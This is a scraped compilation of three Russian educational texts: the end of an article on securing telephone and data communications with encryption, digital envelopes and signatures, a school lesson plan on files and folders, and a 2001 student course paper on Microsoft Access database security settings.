Использование оптоволокна и современного оборудования физически затрудняет возможность несанкционированного подключения к линии и тем самым осложняет злоумышленнику его задачу. Кроме того, корпоративный пользователь может использовать технические средства контроля за каналами связи, выявляющие некоторые типы прослушивающих устройств. Голосовая мобильная (спутниковая) телефония Потребность в системах защиты информации у абонентов сетей подвижной связи наиболее высока. Во-первых, владельцы мобильных телефонов -- это люди, наиболее интересные с точки зрения прослушивания их разговоров как со стороны конкурентов по бизнесу, так и со стороны правоохранительных органов, во-вторых, установить факт прослушивания мобильного телефона практически невозможно. К сожалению, сегодня посоветовать что-либо радикальное пользователю практически невозможно. В России сейчас нет отечественных абонентских комплектов мобильной связи с функциями защиты информации, а ввезти импортные поставщикам практически невозможно. Остается порекомендовать использовать специальные накладки на трубки производства швейцарской компании Crypto AG, которые обеспечивают защиту информации, но купить их можно только в Швейцарии. Теоретически все популярные сотовые стандарты GSM, (D)AMPS, NMT поддерживают режим шифрования данных на участке трубка -- базовая станция, однако ни в одной отечественной сети эта функция не поддерживается, так как существуют жесткие ограничения на ввоз такого оборудования для базовых станций. Из-за этого все сотовые переговоры остаются незащищенными.
Следует отдавать себе отчет в том, что даже если бы функция защиты присутствовала, то ваш разговор был бы защищен только от постороннего прослушивания, но никак не от оператора и, конечно, не от спецслужб. Та же самая ситуация наблюдается и в спутниковых системах связи, в которых операторы вынуждены выполнять требования СОРМ. Не следует считать СОРМ чисто российским изобретением, так называемый полицейский режим заложен в аппаратуру всех ведущих производителей, просто в России сложилось трепетное отношение к человеку в погонах, и он сможет прослушивать нас с вами безо всякой на то санкции.
Для тех, кто все-таки хочет хоть как-то обезопасить себя от прослушивания переговоров по мобильному телефону, замечу, что прослушать аналоговые стандарты NMT и AMPS гораздо легче, чем GSM, DCS и DAMPS. Кроме того, прослушать мобильный телефон в стандарте CDMA для непрофессионала практически невозможно, а от профессионала потребуются громадные финансовые затраты, и фактически оборудование для прослушивания должно дублировать оборудование базовой станции, что далеко не всем доступно. Передача данных Сегодня можно смело считать, что если речь идет о передаче данных, то имеется в виду передача данных в компьютерных сетях или между локальными компьютерами. Здесь в качестве абонентского комплекта будет выступать компьютер, который каким-либо образом (непосредственно через компьютерную сеть, через модем и стационарную телефонную сеть или через мобильный телефон) подключен к другому компьютеру (в случае широковещательных сообщений -- к другим компьютерам). Вместе с задачей непосредственного обеспечения защиты содержимого сообщения от несанкционированного доступа при передаче данных возникает задача подтверждения подлинности переданного сообщения. Как для индивидуального, так и для корпоративного пользователя наиболее приемлемы так называемые технологии цифрового конверта и цифровой подписи в программной реализации.
Суть технологии цифрового конверта в следующем. Вырабатывается уникальное число- ключ. Помещение документа в цифровой конверт осуществляется путем обработки его специальной программой, на вход которой подаются как сам документ, так и число-ключ. Извлечение документа из конверта возможно только при знании числа-ключа. В дальнейшем технология использования цифрового конверта определяется технологией управления данными числами-ключами. Наиболее популярные способы управления ключами предлагает в своих решениях фирма "ЛАН-Крипто" -- это способ многоключевого доступа и способ открытого распределения ключей. Первый способ применяется при доступе к базам данных и заключается в том, что документы в цифровые конверты первоначально помещает администратор системы, он же генерирует числа-ключи. Далее на основе промежуточных чисел-ключей, созданных пользователями системы, и чисел-ключей к конвертам формируются числа-ключи доступа для каждого пользователя. При этом с помощью своего числа-ключа доступа пользователь может извлечь из цифрового конверта те и только те документы, которые ему первоначально разрешил извлекать администратор. При создании новых документов пользователь может сам разрешать или ограничивать к ним доступ других пользователей. В ходе эксплуатации системы может осуществляться полное ее администрирование -- изменение полномочий пользователей, смена паролей, добавление и удаление пользователей и т. д., при этом полной перенастройки системы не требуется.
Открытое распределение ключей на сегодняшний день -- это наиболее перспективный способ управления числами-ключами, используемый практически во всех системах защиты информации в мире. Он заключается в том, что два пользователя независимо генерируют личные числа-ключи, на их основе вырабатывают так называемые открытые ключи, которыми обмениваются. Далее каждый из абонентов сети на основе своего личного числа-ключа и открытого ключа партнера вырабатывает число-ключ, с помощью которого помещает подготовленный для отправки документ в цифровой конверт. Получатель на основе теперь уже своего личного числа-ключа и открытого ключа отправителя изготавливает число-ключ, с помощью которого извлекает из цифрового конверта документ.
Таким образом, по каналу связи документ проходит в конверте и его содержимое недоступно посторонним. Итак, технология цифрового конверта в совокупности с технологиями управления числами-ключами обеспечивает полную защиту информации при ее передаче. "Цифровая подпись" лучше известна пользователям, нежели "цифровой конверт", однако стоит напомнить основу этой технологии. Суть электронной подписи заключается в использовании специального алгоритма генерации подписи и проверки подписи. Пользователь генерирует личное число-ключ, называемое ключом подписи, и число, с ним связанное и называемое ключом проверки. Личное число-ключ пользователь хранит в секрете, а ключ проверки рассылает всем своим корреспондентам. Для проставления подписи служит специальная программа, которая на основе поданного на вход документа и ключа подписи формирует еще одно число, называемое подписью.
Специальная программа, называемая программой проверки, на вход которой подаются ключ проверки, собственно документ и число-подпись, определяет, была ли подпись для данного документа сформирована с помощью ключа подписи, соответствующего ключу проверки. Тем самым выясняется, является ли владелец ключа подписи автором данного документа. Эти две технологии легко реализуются практически на любой программно-аппаратной платформе и в совокупности обеспечивают надежную защиту данных при их передаче по сетям связи. Тем не менее у этих технологий существует потенциальный недостаток: их необходимо встраивать в уже существующие системы, кроме того, несмотря на то, что они универсальны и работают в режиме онлайн, они в большей степени ориентированы на предварительную обработку информации. Для поддержки систем передачи данных, где программная обработка сообщений неприменима (например, из-за ограниченных возможностей абонентского или коммутационного оборудования), используются программно-аппаратные или аппаратные системы защиты информации. К таковым следует отнести модемы с реализацией технологии цифрового конверта и открытого распределения ключей, специальные платы для защиты информации и формирования цифровой подписи.
Данные изделия хотя и не широко, но представлены на рынке отечественных средств защиты информации. Исторически первой разработкой подобного рода является плата "Криптон", реализующая алгоритм ГОСТ 28147-89, однако сейчас все платы семейства "Криптон" отнесены к шифровальным средствам и их применение регламентируется ФАПСИ. Из доступных же широкому пользователю изделий следует упомянуть серию разработок "Грим", осуществляющих аппаратную защиту информации, поставляемых фирмой "ЛАН-Крипто". Специальное предложение... До этого момента мы говорили исключительно об абонентских средствах защиты информации, не касаясь того, как можно организовать обработку конфиденциальных сообщений в самой телекоммуникационной сети. Зачем это нужно
Дело в том, что оператор услуг связи не может предоставить заказчику услуг по защите информации, но потребитель услуг может стать, простите за каламбур, "сам себе оператором" и осуществлять передачу по своей внутрикорпоративной сети конфиденциальной информации так, как ему это захочется. Первым правилом с точки зрения безопасности при создании корпоративной сети является следующее -- необходимо максимально ограничить возможность несанкционированного доступа к коммутационному оборудованию как физически, так и по каналам связи. Это позволит оградить вашу сеть как от части попыток ее взлома, так и от физической порчи. Далее необходимо определить, на каком уровне и какие средства безопасности вы собираетесь внедрять. Согласно принятой ISO семиуровневой модели протоколов взаимодействия открытых систем (так называемый стек ISO/OSI) выделяют следующие уровни в построении телекоммуникационных сетей:
физический;
канальный;
сетевой;
транспортный;
сеансовый;
представительный;
o прикладной. Каждому из этих уровней можно сопоставить определенные средства защиты, которые необходимо использовать при построении сети для передачи конфиденциальной информации. Однако следует понимать, что чем ниже уровень, на котором будет внедряться средство защиты информации, тем оно дороже и сложнее в эксплуатации. О прикладном уровне, которому соответствует абонентское оборудование или прикладная программа пользователя, мы сказали уже достаточно. На сеансовом и представительном уровне (как и на любом другом уровне стека OSI) может функционировать шлюз (gateway), осуществляющий трансляцию протоколов, что для корпоративной сети означает обычно связь с сетями общего пользования. Вместе со шлюзом следует использовать средства защиты информации типа межсетевых экранов, которые препятствуют проходу из сети общего пользования в корпоративную сеть.
Следует отметить, что представительный и сеансовый уровни могут быть неявным образом интегрированы в программное обеспечение, что не должно сказаться на средствах защиты информации. На транспортном уровне функционируют маршрутизаторы, которые работают с адресами устройств в сети. На этом уровне можно использовать защиту информации при передаче от одного маршрутизатора до другого по технологии цифрового конверта в сочетании с открытым распределением ключей или иной схемой выработки общего ключа. Маршрутизаторы популярных моделей практически всегда поддерживают возможность шифрования данных. На сетевом и частично на канальном уровнях функционируют коммутаторы и их более простая разновидность -- мосты, которые работают уже не с сетевыми адресами а с МАС- адресами устройств. Внедрить здесь средства защиты сложнее и наиболее реально использовать дополнительные аппаратные средства защиты. Более реальной представляется необходимость ограничения доступа к списку МАС-адресов.
На физическом уровне работают сетевые адаптеры, повторители и им подобные устройства. С точки зрения защиты здесь использовать практически нечего, исключая технические средства контроля целостности линии и обнаружения несанкционированных подключений. Использование комплексного подхода к созданию защищенной сети не только позволит передавать по ней конфиденциальные сообщения, но также позволит ее владельцу проводить гибкую политику безопасности, разрешая доступ к данным, циркулирующим в сети строго в соответствии с заранее сформулированными требованиями.
Перспективы
В соответствии с тенденциями развития современных телекоммуникационных технологий следует ожидать разделения систем и средств защиты информации на две группы. Первая предназначена для глобальных компьютерных сетей и в первую очередь для Интернета. Поскольку пришествие IP-телефонии становится все более реальным, причем в качестве абонентского оборудования может использоваться и компьютер, а в недалеком будущем, возможно, к Интернету будет подключаться и непосредственно телефон, то в этой группе будут превалировать программные средства защиты информации, функционирующие на прикладном уровне. Естественно, они будут существенно более развиты и поддерживать сетевой сервис, как, например, одна из последних разработок фирмы "ЛАН-Крипто" -- "Сетевой центр сертификации ключей", которая позволяет организовывать на сети общего пользования корпоративную наложенную сеть с реализацией систем "цифровой конверт" и "цифровая подпись" без каких-либо дополнительных доработок.
Очевидным образом понадобится стандартизация подобных решений, и в последнее время подобные вопросы широко обсуждаются. Вторая группа предназначена для защиты информации в системах мобильной связи (сотовой и спутниковой). Здесь, мне кажется, не следует ожидать радикальных подвижек и основными средствами защиты представляются дополнительные аппаратные приставки к телефонам, выпускаемые специализированными фирмами. С точки зрения передачи конфиденциальной информации мобильный телефон будет представлять интерес как средство доступа к телефонной сети для передачи защищенных данных с персонального компьютера. |
https://doc4web.ru/informatika/urok-po-teme-papki-i-fayli.html | Урок по теме: «Папки и файлы» | https://doc4web.ru/uploads/files/35/470e2f43c88c6a46dd7520ba0fee6425.docx | files/470e2f43c88c6a46dd7520ba0fee6425.docx | Урок по теме: «Папки и файлы»
Недорезова Екатерина Игоревна, муниципальное бюджетное
общеобразовательное учреждение средняя общеобразовательная
школа №6 с углубленным изучением отдельных предметов
Бугульминского муниципального района Республики Татарстан,
учитель информатики
Формы проведения урока: лекционно-практический метод, демонстрация.
Цели урока: Помочь учащимся осознать практическую значимость систематизации информации с помощью папок и файлов.
Задачи урока:
Образовательные:
получить представление об иерархической структуре компьютера;
изучить основные понятия: файл, папка, расширение и имя файла;
рассмотреть на практике операции с файлами и папками.
Развивающие:
развить умение ориентироваться в дереве каталогов;
развить навык выполнения операций над файлами: копирование, переименование, вставка, удаление;
развить интерес к изучению информатики.
Воспитательные:
воспитать чувство ответственности за программное обеспечение (системные каталоги) размещённое на диске.
В результате освоения материала урока:
Учащиеся должны знать:
об основных способах организации информации;
владеть понятиями: файл, папка (каталог, директория), имя файла;
уметь оперировать этими понятиями;
знать основные правила в описании файлов и папок;
Учащиеся должны уметь:
осуществлять операции с файлами и папками.
Сегодня на уроке мы узнаем как храниться информация и в виде чего. Тема сегодняшнего урока «Папки и файлы».
Ответьте на вопрос «Где храниться вся информация в компьютере?» вся информация в ПК храниться в виде файлов на дисках. Файл – это определенная порция информации, хранящаяся в ПК на внешнем носителе и объединенная общим именем.
Имя файлу придумывает тот, кто его создает. Оно состоит из двух частей, разделенных точкой: собственно имя файла (до 255 символов) и расширения (3 символа). Имя файла включать латинские и русские буквы и др. символы.
Расширение файла обычно задается программой автоматически при его создании и указывает, какого рода информация хранится в файле, тип файла
Наиболее употребляемые типы файлов:
исполнимые;
текстовые документы;
графические;
звуковые.
Все файлы на диске хранятся в определенной системе: в папках, которые, в свою очередь, могут содержаться в других папках (быть вложенными в них) и т.д.
Операции с файлами:
модификация (открыть, внести изменения и сохранить под тем же именем);
копирование (скопировать и сохранить в другой папке);
удаление;
перемещение.
При работе с файлами не следует:
удалять файл, не выяснив, что это следует делать;
давать файлу имя, которое не поясняет его содержание;
сохранять файл в той папке, в которой его потом будет трудно найти;
удалять или перемещать файлы из прикладных программ, т.к. программы могут перестать работать.
Выберите допустимые имена файлов из перечисленных ниже:
LIN?EXE
IVAN*.DOC
КУКУ.BMP
A.B.TXT (правильный ответ-3)
5) Придумайте имена и типы для файлов, содержащих следующую информацию: ( на доске учащиеся пишут имена файлов) (слайд 6)
Какие действия можно выполнить над файлом? ( открыть, закрыть, создать, копировать, перемещать, переименовать, удалять, хранить, архивировать и т.д.) (слайд 7)
Что такое файловая система?
(Файловая система – это особый способ организации и хранения файлов во внешней памяти компьютера.) ( слайд 8)
Какие бывают файловые системы? (одноуровневые и многоуровневые) (слайд 9)
Как указывается путь к файлу? (Путь к файлу начинается с логического имени диска, затем записывается последовательность имен вложенных друг в друга папок, в последней из которых содержится нужный файл.)
Что такое полное имя файла? ( Путь к файлу вместе с именем файла называют полным именем файла) (слайд 10)
Молодцы, ребята. Вы правильно ответили на все вопросы. А теперь перейдем к практической части нашего урока.
Ребята, приведите примеры из жизни, где информацию можно представить в виде файловой системы? ( примеры ребят)
Значимый для каждого человека, уважающего историю своего народа, предков, процесс-составление своего генеалогического дерева. Это дает возможность человеку найти ответы на вопросы : Кто я? Кто мои предки? Откуда исходят мои корни ? Почему у меня такая фамилия? Этот вопрос очень актуален в этом году, потому что он объявлен Годом семьи.
Сейчас каждый из вас займется составлением генеалогического дерева. Ведь родословная имеет вид файловой многоуровневой структуры. На последнем уроке вы получили на дом задание :сделать небольшую проектную работу- составить свою родословную.
Задача 2. Дана иерархическая файловая система. ( слайды 11, 12)
Укажите путь к каждому файлу.(устно)
Запишите полные имена файлов.( на доске)
Задача 3. В карточке даны полные имена файлов. Ваша задача - построить файловую структуру . (слайд 13)
Для этого задания мы будем работать с помощью организационной диаграммы в программе МО Word. |
https://doc4web.ru/informatika/zaschita-baz-dannih-access-.html | Защита баз данных. Access 2000 | https://doc4web.ru/uploads/files/190/46350e4ef2ddcda168b4d8b42c8209c3.docx | files/46350e4ef2ddcda168b4d8b42c8209c3.docx | 2
Министерство образования РФ
Череповецкий государственный университет
Кафедра информатики
Дисциплина:
«Системное и прикладное программное обеспечение»
КУРСОВАЯ РАБОТА
Тема: «Защита баз данных. Архитектура защиты в Access.»
Выполнила студентка: Данилюк Галина
Группа: 1ПМ-31
Принял преподаватель: Лягинова О.Ю.
«__»____________
(дата)
_______________
(подпись)
Череповец 2001
Содержание
Введение 3
§1. Архитектура защиты Access 4
§2. Пользователи, группы и разрешения 5
§3. Встроенные пользователи и группы 5
§4. Разрешения на доступ к объектам 6
§5. Явные и неявные разрешения 8
§6. Использование мастера защиты 10
§7. Подготовка к установке защиты 10
§8. Запуск мастера 15
§9. Настройка защищенной базы данных 20
Список литературы. 22
Введение
В самом общем смысле база данных – это набор записей и файлов, организованных особым образом. В компьютере, например, можно хранить фамилии и адреса друзей или клиентов. Возможно, вы храните все свои письма, и они сгруппированы по адресатам, а возможно, у вас есть набор файлов с финансовыми данными: полученные или выставленные счета, расходы по чековой книжке и так далее.
В широком смысле, один из типов баз данных – это документы, набранные с помощью текстовых редакторов и сгруппированные по темам. Другой тип – файлы электронных таблиц, объединяемые в группы по характеру использования.
Если вы организованный человек, то специальная структура папок и подпапок поможет вам справиться с несколькими сотнями электронных таблиц или ярлыков. В этом случае вы являетесь диспетчером базы данных.
Но если решаемая вами задача становится слишком сложной: собрать информацию обо всех клиентах и заказах, если данные разбросаны по отдельным текстовым файлам и электронным таблицам; сохранить связи между файлами при вводе новой информации и так далее, то вам необходима система управления базами данных (СУБД).
Принято считать самой популярной системой управления базами данных для персональных компьютеров продукт, впервые появившийся в 1992 году и носящий название Microsoft Access.
Microsoft Access – это полнофункциональная реляционная СУБД. В ней предусмотрены все необходимые средства для определения и обработки данных, а так же для управления ими при работе с большими объемами информации.
Информация, имеющая определенную ценность, нуждается в защите, как от «дурака», так и от несанкционированного доступа.
Защита паролем, сохранение базы данных в виде MDE-файла (в этом случае базу данных можно открывать для просмотра, но не для изменения) могут «закрыть» для случайного пользователя возможности, которые не разрешается использовать. Но опытный пользователь Access может открыть базу данных при нажатой клавише Shift (чтобы не запустить приложение), изучить исходные тексты процедур и определить, как «взломать» защиту. Чтобы действительно предотвратить несанкционированный доступ к объектам этой базы, необходимо использовать средства защиты, встроенные в Access.
Вряд ли существует абсолютно надежная компьютерная система защиты. Хотя средства защиты Microsoft Access считаются одними из лучших для персональных компьютеров, найдутся умельцы, которые при наличии времени смогут проникнуть в вашу защищённую базу данных Access. Если нужна более надежная защита данных, подумайте о переходе к другой системе управления базами данных класса Microsoft SQL Server.
§1. Архитектура защиты Access
Если у вас имеется опыт работы с защитой, используемой на сервере или большой ЭВМ, структура защиты в Access покажется вам знакомой. Вы можете указать пользователей, которым предоставляется или, наоборот, не разрешается доступ к объектам базы данных. Кроме того, вы можете определить группы пользователей и назначить разрешения на уровне группы, чтобы облегчить построение защиты для большого числа пользователей. Пользователю достаточно быть членом группы, чтобы получить права доступа, установленные для неё.
Access хранит информацию о защите в двух местах. Во время установки программа Setup создаст в папке \Program Files\Microsoft Ofice\0ffice стандартный файл рабочей группы (System.mdw), который впоследствии используется по умолчанию при запуске Access. Этот файл содержит информацию обо всех пользователях и группах. При создании базы данных Access сохраняет сведения о правах, предоставляемых конкретным пользователям и группам, в файле базы данных.
Общая структура защиты Access отображена на рисунке 1. Учётные записи пользователей и групп хранятся в файле рабочей группы. Разрешение на доступ к конкретным объектам сохраняются в файле базы данных.
Рабочая группа
(обычно System.mdw)
Код рабочей группы
Пользователи
Код пользователя
Группы
Код группы
База данных приложения
(таблицы, запросы, формы,
отчеты, модули),
принадлежащая рабочей группе
Объект
Разрешение на доступ к объекту
Код пользователя или группы
Рис. 1
Расположение текущего файла рабочей группы хранится в реестре Windows. Можно использовать служебную программу Wrkadm.exe (администратор рабочих групп) для изменения текущего или определения нового файла рабочей группы. Кроме того, можно выбирать нужный файл рабочей группы во время выполнения приложения, задав соответствующий параметр командной строки в ярлыке запуска. Если вам приходится часто запускать в сети совместно используемое защищенное приложение, нужно позаботиться о том, чтобы системный администратор задал вашу рабочую группу, используемую по умолчанию, как общий файл в сетевой папке.
Каждая рабочая группа имеет уникальный внутренний идентификатор, генерируемый Access при определении файла рабочих групп. Любая база данных, созданная пользователем рабочей группы, «принадлежит» как этому пользователю, так и рабочей группе. Каждый пользователь и группа также имеет уникальный внутренний идентификатор, но можно дублировать один и тот же код пользователя и группы в нескольких рабочих группах. Когда вы назначаете право доступа к объекту своей базы данных, Access сохраняет в ней внутренний идентификатор пользователя или группы вместе с информацией о доступе. Таким образом, предоставленные вами права перемещаются вместе с файлом базы данных при копировании его в другую папку или на другой компьютер.
§2. Пользователи, группы и разрешения
В общем случае компьютерная система защиты может быть открытой или закрытой. В открытой системе доступ, если только он не запрещен специально, предоставляется всем пользователям (даже если они не известны системе). В закрытой системе доступ предоставляется только тем, кому он был назначен. На первый взгляд, система защиты Access кажется открытой, поскольку вы можете запускать Access без регистрации, создавать базы данных, передавав их другим пользователям, которые могут открывать и изменять их по своему усмотрению. Вы можете совсем не иметь дела с защитой. Но на самом деле система защиты Access является закрытой и кажется открытой только потом что в стандартной рабочей группе, используемой по умолчанию, всегда имеются определенные встроенные коды пользователей и групп, общие для всех устанавливаемых копии Access.
§3. Встроенные пользователи и группы
При установке Access всегда создается стандартная рабочая группа, содержащая один встроенный код пользователя и два встроенных кода групп. Код пользователя называется Admin, и для него не определен пароль. Access автоматически загружает вас с этим кодом и предоставляет вам все права к привилегии этого пользователя. При создании базы данных или нового объекта в базе данных ваш текущий код пользователя становится владельцем объекта и по умолчанию получает полные права на доступ к этому объекту. Поскольку большинство пользователей Microsoft Access никогда «не включают» защиту и загружаются как пользователи Admin, владельцем всего, что они создают, является универсальный код Admin.
Первой встроенной группой является группа Users. Все пользователи, в том числе и новые, становятся ее членами и не могут быть удалены из нее, Кроме того, внутренний идентификатор группы Users всегда один и тот же во всех устанавливаемых в мире копиях Access. Группе Users автоматически предоставляются полные права доступа к любому новому объекту или базе данных, которые вы создаете. Это означает, что даже если пользователь зарегистрировался с кодом иным, чем Admin, он все равно имеет полный доступ к вашим базам данных и объектам в них, поскольку пользователь всегда является членом универсальной группы Users!
Вторая встроенная группа называется Admins. Ее внутренний идентификатор уникален для каждого файла рабочей группы и определяется на основе информации, которую вы предоставляете программе администратора рабочих групп при создании файла. По умолчанию в эту группу включен только пользователь Admin. Но, как показано ниже, вы можете определить другого пользователя, включить его в группу Admins и удалить пользователя Admin. Эта группа должна содержать, по крайней мере, одного пользователя.
Группа Admins обладает двумя основными привилегиями. Во-первых, члены группы Admins могут определять и изменять учетные записи пользователей и групп, а так же устанавливать и менять пароли. (Вы всегда можете изменить собственный пароль.) Во-вторых, члены группы Admins имеют полный доступ к любым базам данных, созданным при использовании этого файла рабочей группы. Члены этой группы могут первоначально не иметь никаких разрешений на доступ к объектам, но могут назначить себе нужные права. Для понимания этого свойства важно иметь в виду, что любая база данных, созданная при использовании конкретного файла рабочей группы, наследует код этой рабочей группы. Некто может быть членом группы Admins в другом файле рабочей группы, но если коды рабочих групп не совпадают, этот пользователь не получит прав доступа к вашей базе данных.
§4. Разрешения на доступ к объектам
В таблице 1 приведены разрешения, которые можно назначать базе данных или ее объектам. Обратите внимание, что у владельца объекта может и не быть никаких конкретных разрешений, но, пользуясь своим статусом владельца, он имеет право предоставлять любые или все разрешения любому пользователю или группе, включая себя самого.
Таблица 1. Типы разрешений на доступ
Разрешение
Объект
Разрешённые действия
Открытие/запуск (Open/Run)
База данных, форма, отчет, макрос
Открытие базы данных, формы или отчета, запуск макроса. (Любой пользователь может выполнять процедуры в модулях.)
Монопольный доступ (Open Exclusive)
База данных
Открытие базы данных для монопольного доступа. Без этого разрешения пользователь не может открыть базу данных и отключить других пользователей
Чтение макета (Read Design)
Таблица, запрос, форма, отчет, макрос, модуль
Просмотр объектов в режиме конструктора. Если для таблицы или запроса предоставлен любой тип доступа к данным, автоматически дается разрешение на чтение макета, поскольку оно необходимо для корректного открытия набора записей
Изменение макета (Modify Design)
Таблица, запрос, форма, отчет, макрос, модуль
Просмотр и изменение макета объектов. Если в приложении используется программа Visual Basic, изменяющая макеты запросов во время выполнения, вы должны предоставить разрешение на изменение макета всем пользователям этих запросов
Администратора (Administer)
База данных, таблица, запрос форма, отчет, макрос, модуль
Предоставление разрешений на доступ к объекту, даже если пользователь или группа не является владельцем объекта
Чтение данных (Read Data)
Таблица, запрос
Просмотр данных таблицы. Также дает разрешение на чтение макета. В случае запроса пользователь должен иметь разрешение так же на чтение данных для всех используемых в нем таблиц или запросов
Обновление данных (Update Data)
Таблица, запрос
Обновление данных таблицы или запроса. Кроме того, предоставляет разрешения на чтение данных и макета. В случае запрос пользователь должен иметь также разрешение на обновление данных для всех таблиц, изменяемых с его помощью.
Вставка данных (Insert Data)
Таблица, запрос
Вставка данных в таблицу или запрос. Кроме того, предоставляет разрешения на чтение данных и макета. В случае запроса пользователь должен дополнительно иметь разрешение на вставку данных для всех таблиц или запросов, изменяемых с его помощью
Удаление данных (Delete Data)
Таблица, запрос
Удаление данных из таблицы или запроса. Кроме того, предоставляет разрешения на чтение данных и макета. В случае запрос пользователь должен дополнительно иметь разрешение на удаление данных для всех таблиц, изменяемых с его помощью
§5. Явные и неявные разрешения
Как отмечалось выше, вы можете получить доступ к объекту, благодаря разрешению, назначенному вашему коду пользователя, или через разрешения, предоставленные любой группе, к которой вы принадлежите. Access использует модель «наименее ограничительных» разрешений. Это подразумевает, что вы обладаете наибольшими правами доступа, предоставленными вашему коду пользователя и любой из групп, в которые вы включены. На рисунке 2 показано гипотетическое множество пользователей и групп вместе с разрешениями доступ к объекту Таблица, явно назначенными каждому пользователю и группе. Обратите внимание, что отдельные пользователи могут неявно наследовать дополнительные разрешения или права благодаря их членству в одной или скольких группах. Денис имеет, по крайней мере, разрешения на чтение, обновление, вставку и удаление данных, так как он является членом группы Маркетинг. Будучи владельцем объекта Таблица (как его создатель), Денис также получает права администратора и разрешение на изменение макета, так как Access назначает эти разрешения при создании объекта. А если кто-то другой создал этот объект и позднее передал права владельца Денису, то Денис моя предоставить самому себе любые отсутствующие разрешения.
Торговля
Чтение данных
Маркетинг
Чтение данных
Обновление данных
Вставка данных
Удаление данных
Анна
Чтение данных
Обновление данных
Вставка данных
Удаление данных
Мария
Чтение данных
Обновление данных
Вставка данных
Удаление данных
Денис
Владелец
Иван
Чтение данных
Обновление данных
Рис. 2. Пример, показывающий явно назначенные разрешения, а так же неявные разрешения и права каждого пользователя. Явные разрешения напечатаны обычным шрифтом, а унаследованные – курсивом.
Поскольку пользователи всегда являются членами группы Users, которой по умолчанию предоставляются все права доступа к любому новому объекту, любой другой пользователь, а не только Admin, может получить полный доступ ко всем вашим объектам. Чтобы проверить разрешения пользователя или группы, сначала откройте нужную базу данных. Вы должны быть владельцем базы данных и всех объектов, которые хотите проверить, или иметь разрешение администратора на доступ к базе данных и объектам. После выбора команды Сервис Защита Разрешения (Tools Security User And Group Permissions) Access откроет окно диалога.
Рис. 3. Некоторые разрешения, предоставленные группу Users
В списке в левой верхней части окна отображаются пользователи или группы, определенные в базе данных. Установите переключатель Пользователи (Users) или Группы (Groups) в зависимости от того, что вы хотите увидеть. В списке Имя объекта (Object Name) выводятся объекты базы данных. Пользуясь расположенным ниже раскрывающимся списком, можно изменить тип отображаемых объектов. После выбора нужного объекта флажки в нижней части окна отобразят явно назначенные разрешения. Если вы выберете группу Users и просмотрите объекты, то убедитесь, что она имеет полные права доступа ко всем объектам. Кроме того, имея права администратора на доступ к объектам, можно выбирать любые из этих объектов и изменять разрешения, предоставляемые пользователю или группе.
Внимание! Не пробуйте изменять разрешения или владельца объекта до тех пор, пока полностью не поймете все возможные последствия такого действия. Если вы только приступили к изучению системы защиты Access, в целях безопасности работайте с запасной копией своей базы данных. Может случиться так, что вы отмените свое разрешение и не сможете восстановить его!
На вкладке Смена владельца (Change Owner) для любого объекта вы можете определить, кто (пользователь или группа) является его текущим владельцем. В большинстве случаев всеми объектами владеет пользователь Admin. Вы можете выделить один или несколько объектов, выбрать другого пользователя или группу и щелкнуть на кнопке Сменить владельца (Change Owner), чтобы назначить нового владельца. Никогда не передавайте объект другому владельцу, если вы полностью не понимаете возможные последствия такого действия. Прежде чем назначить объекту нового владельца, вы должны твердо знать, как зарегистрироваться в качестве такого владельца. Если вы владеете объектом, то всегда можете передать права владельца другому коду пользователя или группы (или отобрать их).
§6. Использование мастера защиты
Теперь, после знакомства с системой защиты Access, должно быть очевидно, что для реальной защиты базы данных требуется немало усилий. При обычной установке Access стандартная рабочая группа создается на основе информации о пользователе Windows и названии организации. Поэтому любому человеку, имеющему доступ к вашему компьютеру, не представит особого труда выяснить эти сведения и продублировать их. Итак, для начала вам нужна уникальная рабочая группа, чтобы было трудно воспроизвести ее идентификатор, дающий всем членам группы Admins право изменять разрешения. Затем вам потребуется код пользователя, отличный от Admin, в качестве владельца вашей базы данных и всех ее объектов. Кроме этого, для всех объектов необходимо удалить разрешения из группы Users. А чтобы никто не мог изучить ваши данные и тексты процедур с помощью служебных программ для просмотра дисков, вы должны зашифровать базу данных.
Конечно, можно проделать все эти шаги «вручную», но Microsoft предоставляет мастера, помогающего установить защиту на уровне пользователя. Он выполнит за вас перечисленные выше шаги, включая шифрование базы данных. Но прежде чем воспользоваться его помощью, необходимо выполнить несколько операций.
§7. Подготовка к установке защиты
Чтобы мастер защиты успешно выполнил свою работу по установке защиты базы данных, вы должны зарегистрироваться под именем владельца этой базы данных или в том же самом файле рабочей группы, который использовался вами при создании базы данных, и при этом быть в нем членом группы Admins. Вспомните, что одним из важнейших шагов является создание новой рабочей группы с уникальным кодом, которая, скорее всего, будет отличаться от рабочей группы, использовавшейся при создании базы данных. Кроме того, при создании базы данных вы, вероятнее всего были зарегистрированы как пользователь Admin, а для базы данных, владельцем которой является Admin, нельзя установить защиту. В этом случае вам придется назначить нового владельца.
Мастер защиты в Access 2000 позволяет защитить базу данных, даже если вы зарегистрировались как пользователь Admin в первоначальной рабочей группе. В этой ситуации мастер заставит вас создать новую рабочую группу. В новой рабочей группе мастер сделает владельцем базы данных новый код пользователя. Но это возможно только в том случае, если вы являетесь владельцем базы данных. Вы также можете перед запуском мастера создать новую рабочую группу и в ней новый код пользователя (не Admin) в группе Admins, но этот пользователь должен быть владельцем базы данных, в противном случае попытка мастера переназначить владельца кажется безуспешной.
Вы сможете лучше понять систему защиты Access, если сначала создадите новую рабочую группу, определите, по крайней мере, один код пользователя и дадите пользователя Admin из группы Admins. Найдите программу Wrkgadm.exe на своем компьютере. При установке Access она обычно помещается в папку, в которой установлен пакет Microsoft Office. Если Microsoft Office установлен в папке Program Files на диске С, ярлык должен работать без каких-либо изменений. Если Microsoft Office находится в другом месте, в Проводнике Windows установите указатель на этом ярлыке, нажмите правую кнопку мыши, контекстном меню выберите команду Свойства (Properties) и затем на вкладке Ярлык (Shortcut) измените содержимое полей Файл (Target) и Рабочий каталог (Start In). Дважды щелкните на ярлыке, чтобы запустить администратора рабочих групп.
Рис. 4. Начальное окно диалога администратора рабочих групп
Начальное окно диалога администратора рабочих групп для Access 2000 не отображает, в отличие от предыдущих версий, имя пользователя и название организации. Но эту важную для защиты информацию все равно можно легко найти, открыв любое приложение Microsoft Office на компьютере и выбрав команду Справка 0 программе (Help About). Здесь приведен полный путь к текущему файлу рабочей группы. Как показано на рисунке 4, стандартный файл рабочей группы называется System.mdw и находится в папке Office. Если вы создали другой файл рабочей группы, то в окне диалога, которое открывается щелчком на кнопке Связь (Join), можете ввести путь к этому файлу или воспользоваться кнопкой Обзор (Browse) для указания его местонахождения.
